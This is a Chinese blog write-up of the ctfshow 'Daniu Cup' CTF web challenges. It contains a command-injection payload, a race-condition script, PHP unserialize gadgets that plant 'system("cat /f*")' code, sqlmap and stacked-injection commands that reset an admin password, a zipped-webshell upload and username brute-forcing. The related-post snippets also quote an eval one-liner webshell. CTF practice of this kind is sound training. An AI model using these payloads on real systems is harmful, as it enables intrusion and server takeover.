ctfshow 大牛杯web

最新推荐文章于 2024-05-09 16:52:03 发布
最新推荐文章于 2024-05-09 16:52:03 发布
阅读量9.6k 收藏 2
点赞数 3
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/miuzzx/article/details/116352564
版权

文章目录

web_checkin

。。。。。。我傻了 数错字符了。。。。。
直接

?code=?><?=`nl%09/*`

就可以了。

原来的做法
输入

?code=?><?=`nl%09*`

得到源码
在这里插入图片描述
很明显是想让我们条件竞争。
生成文件

?code=`nl%09/*>b`

开始竞争

import requests
import threading
import sys
session=requests.session()
url1="http://ba2bd9c4-6f58-45a1-a637-3cf0140e89c1.challenge.ctf.show:8080/sandbox/3fa05e3dafa3d6413be416b360149b5c/"
url2='http://ba2bd9c4-6f58-45a1-a637-3cf0140e89c1.challenge.ctf.show:8080/sandbox/3fa05e3dafa3d6413be416b360149b5c/b'
def write():
	while True:
		r = session.get(url1)
def read():
	while True:
		r = session.get(url2)
		if len(r.text)!=9561: #随便get传一次就能得到这个长度
    			print(r.text)

threads = [threading.Thread(target=write),
       threading.Thread(target=read)]
for t in threads:
	t.start()

easy_unserialize

非预期了

<?php
class A{
}
class main{
    public $settings;
    public $params;

    public function __construct(){
        $this->settings=array(
        'error_log'=>'yu.php',
        'unserialize_callback_func'=>'<?php system("cat /f*");?>',
        'html_errors'=>false
        );
        $this->params=serialize(new A());      
    }
}
$a=new main();
echo serialize($a);

ini_set('error_log','yu.php');
 错误日志写入的文件名

ini_set('unserialize_callback_func','mycallback');
当反序列化后,PHP会寻找mycallback这个方法来include这个类文件,如果你没定义这个方法则报错。

ini_set('html_errors',false);
不加这个的话,错误日志内容会html编码。

首先我们可以通过error_log生成php文件,剩下的就是怎么把想执行的命令在报错中显示。
剩下的就交给unserialize_callback_func了,只要值是没有定义的方法,就会把这个方法在报错中显示出来。

其实unserialize_callback_func还有一个功能,就是可以执行函数,函数的参数是反序列化的类名。

<?php
class main{
    public $settings;
    public $params;

    public function __construct(){
        $this->settings=array(
        'unserialize_callback_func'=>'system',
        );
        $this->params='O:2:"ls":0:{}';      
    }
}
$a=new main();
echo serialize($a);

这样其实是可以执行system(‘ls’)的,但是类名只能有_(下划线)一个特殊符号,所以放弃了。

预期解

<?php
class settings{

}
class main{
    public $settings;
    public $params;

    public function __construct(){
        $this->settings=array(
        'unserialize_callback_func'=>'spl_autoload',
        );
        //$this->params=serialize("<?php system('cat /f*');"); 生成settings.inc文件,内容是<?php system('cat /f*');
        //$this->params=serialize(new settings()); 加载settings.inc
        
    }
}
$a=new main();
echo serialize($a);

spl_autoload 
它可以接收两个参数,第一个参数是$class_name,表示类名,第二个参数$file_extensions是可选的,表示类文件的扩展名,如果不指定的话,它将使用默认的扩展名.inc或.php

也就是说如果第一个参数是settings第二个没有传值,就会去加载(include)settings.inc文件,并且setting.inc文件内容我们可控。

easy_cms

可以sqlmap跑出来具体的管理员所在的表,也可以直接自己本地搭一下。
表名jz_level 列名 name,pass
pytno sqlmap.py url/home/jizhi_details/?id=1 -D jizhicms192 -T jz_level -C name,pass --dump --batch
得到用户名feng,和加密的密码

问的别的师傅说是堆叠注入,然后sqlmap跑了下,拿到个payload。

python sqlmap.py -u  url/home/jizhi_details/?id=1 --technique S --risk 3 --level 5 --dbs --batch

在这里插入图片描述
接着修改管理员密码。
home/jizhi_details/?id=1';update jz_level set pass='a07b6751d2d9fb3a3a8488a030c69ec6' where name='feng'%23
在源码里找了下具体的对比密码的代码

在这里插入图片描述
我上面用的密码123456编码后的。
在数据库中存储的就是 md5(md5(123456).YF)。先md5加密123456,得到的字符串拼接上YF再进行md5加密。

接着进入后台找getshell点。题目给了个提示hint:后台似乎有个压缩包getshell.
搜了下
在这里插入图片描述
在这里插入图片描述

发现有个和解压缩包相关的。在他之前还有个下载文件的.
在这里插入图片描述
也就是说我们把一句话压缩成zip,然后上传再解压就可以getshell了。
在插件里面发现了和下载相关的,应该就是这个地方了。
在这里插入图片描述
bp抓包,其中有如下这么一个包。
在这里插入图片描述
url我们改成自己vps的,返回了具体的位置。
在这里插入图片描述

在这里插入图片描述

再来看下解压的函数,最终会把解压的文件放入这个目录下。
在这里插入图片描述
我们在原来包的基础上将action改成file_upzip

在这里插入图片描述
接着去访问/A/exts/2.php就可以了 (因为压缩的文件是2.php)

RealWorld_CyberShow

密码直接给了,然后用户名还给了示例。
在这里插入图片描述
在这里插入图片描述

剩下的就是.。。。。。。。。爆破用户名。。。。。。。。。。。。
试试从2020000000开始爆破
到2020036001出来了。。。。。。。。
非预期了

yu22x
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 12
    评论
[ctfshow]大牛杯
Huamang的博客
05-16 976
web_checkin <?php error_reporting(0); include "config.php"; //flag in / function check_letter($code){ $letter_blacklist = str_split("abcdefghijklmnopqrstuvwxyz1234567890"); for ($i = 0; $i < count($letter_blacklist); $i+=2){ if (preg
Ctfshow 五月赛 大牛杯 Web&BlockChain
feng的博客
05-03 1722
web_checkin ban了这些: acegikmoqsuwy13579 \+ _ \( & - # @ ~ \[ { \" \. , : 直接拿短标签和nl,反引号打: ?><?=`nl%09/*`
网络安全最全ctfshow卷王杯——easy unserialize_卷王杯 easy unseriliz(2),2024年最新分分钟搞定
最新发布
2303_79055586的博客
05-09 379
*[需要这份系统化资料的朋友,可以点击这里获取](https://bbs.csdn.net/topics/618540462)*** __toString():$this->object->string -> 读取不可访问属性触发get()this->object->add() ->调用一个不存在的方法触发call()//实现second:addMe()->one:toString()//实现one:destruct()->second:call()name]() ->调用one:MeMeMe()
[ctf.show.reverse] 太牛杯 easy
weixin_52640415的博客
04-26 380
貌似很复杂的一个题一点点弄明白。 程序上来就给了加密方式,但由于里边用了and运算,所以本身是不可逆的,需要正向爆破。 int __thiscall sub_401080(char *this) { char v2; // al char *v3; // edi char *v4; // ebx int v5; // edx int v6; // ecx int v7; // eax int v8; // esi int v9; // eax int result;
CTFshow-大牛杯
i_kei的博客
01-22 1735
2021-1月23日大吉杯盛大开幕 比赛地址:https://ctf.show/challenges 比赛群号:372619038 无需报名:提前注册好账号即可 比赛态势直播间地址: https://live.bilibili.com/22405530
BUUCTF_web_CheckIn
silence1_的博客
08-31 2178
BUUCTF_web_CheckIn 题目: 题目是SUCTF 2019的web题, 题目源码:https://github.com/team-su/SUCTF2019/tree/master/Web/checkIn 也是看了大佬的writeup才做出来,太菜了。。。orz 学到了一种新的上传姿势。 打开题目是一个上传界面。 随便上传一个php文件,意料之中被拦。 burp抓包改后缀为jpg,提示...
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【标题】"CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$" 指的是一项网络安全竞赛中的Web题目,该题目重点在于理解PHP编程语言中的变量循环取值机制。在CTF(Capture The Flag)比赛中,参赛者通常需要解决各种...
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
CTFSHOW web193 left标注盲注脚本
05-04
这段代码是一个用于获取某个网站的 flag 的脚本。它使用了 SQL 注入漏洞来获取 flag。具体来说,它通过构造 SQL 语句的方式,逐个字符地获取 flag。其中,它通过修改注入语句中的 payload 变量,来获取不同的信息,...
ctfshow web189 无单引号,利用回显不同,盲注
10-21
ctfshow web189 无单引号,利用回显不同,盲注
82.WHUCTF之隐写和逆向类解题思路WP(文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析)_杨秀璋的专栏-CSDN博客
08-03
声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。前文学习:[网络
GKCTF web-CheckIN 解题思路writeup
qq_41743240的博客
05-24 1027
打开题目可以看到源码 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = @$this->x()['Gin
SUCTF web CheckIn
weixin_42499640的博客
08-19 2703
记录一道SUCTF的web1 据菠萝师傅说这是他们出的签到题 我tcl
WMCTF2020 webweb_checkin
Firebasky的博客
08-04 2619
这道题是自己没有做出来,当时也没有认真做,最后看看来NU1L的wp才知道思路。 NU1L真的太强了,向他们看齐!!! 题目:web_checkin <?php //PHP 7.0.33 Apache/2.4.25 error_reporting(0); $sandbox = '/var/www/html/' . md5($_SERVER['REMOTE_ADDR']);//remote_addr代表客户端的IP @mkdir($sandbox);//创建一个文件 @chdir($sandbox);.
CTFshow webAK赛 (签到_观己)
半文盲半疯癫重度手机爱好者,世界选社恐大赛第二名。
07-15 530
1.打开环境 Fn+F12(或者F12) 检查元素,打开Hackbar。 Hackbar 安装教程 2.首先访问file=/var/log/nginx/access.log看日志文件是否存在 一句话木马: <?php @eval($_GET['pass']);?> 上述操作结果如下: 3.添加 &pass=phpinfo(); 效果: (emm..有点走远了.....) 4. 改成: &pass=system("ca...
CTFSHOW卷王杯 easy unserialize
Landasika的博客
05-17 1288
<?php include("./HappyYear.php"); class one { public $object; public function MeMeMe() { array_walk($this, function($fn, $prev){ if ($fn[0] === "Happy_func" &&am...
ctfshow reverse36D杯
m0_58348028的博客
02-20 415
目录 签到 签到 发现这个题只要理解清楚他do-while循环中的东西就好了 推测v8即为flag 经过下面的处理之后才出flag上代码 int main() { char flag[31]; int v4; int v6; // [rsp+4h] [rbp-8Ch] unsigned int v7; // [rsp+8h] [rbp-88h] char v8; int v9[31]; char v10[4]; // [rsp+8Ch] [rbp-4h]
2022/03/14ctfshow卷王杯easy unserialize
A的博客
03-14 389
public function MeMeMe() { array_walk($this, function($fn, $prev){ if ($fn[0] === "Happy_func" && $prev === "year_parm") { global $talk; echo "$talk"."</br>"; global $flag; echo $fla
ctfshow菜狗杯web
09-07
ctfshow菜狗杯web是一个CTF比赛中的一个项目,其中包含了多个题目和挑战。其中有一个题目叫做"web2 c0me_t0_s1gn",这是一个需要进行签到的题目。 在这个题目中,源码中没有对number2进行正则匹配校验,所以number2是沙箱逃逸的入手点。 在解题过程中,可以通过传入cookie中的CTFshow-QQ群:=a,然后通过$_GET['b']和$_REQUEST['c']的方式获取到需要的值。最终可以通过传入一个数组给到eval来执行代码。 总的来说,ctfshow菜狗杯web是一个CTF比赛中的项目,其中包含了多个题目和挑战,其中一个题目是"web2 c0me_t0_s1gn",解题过程中需要利用沙箱逃逸和通过传入参数来执行代码。<span class="em">1</span><span class="em">2</span><span class="em">3</span><span class="em">4</span>
评论 12
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yu22x

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值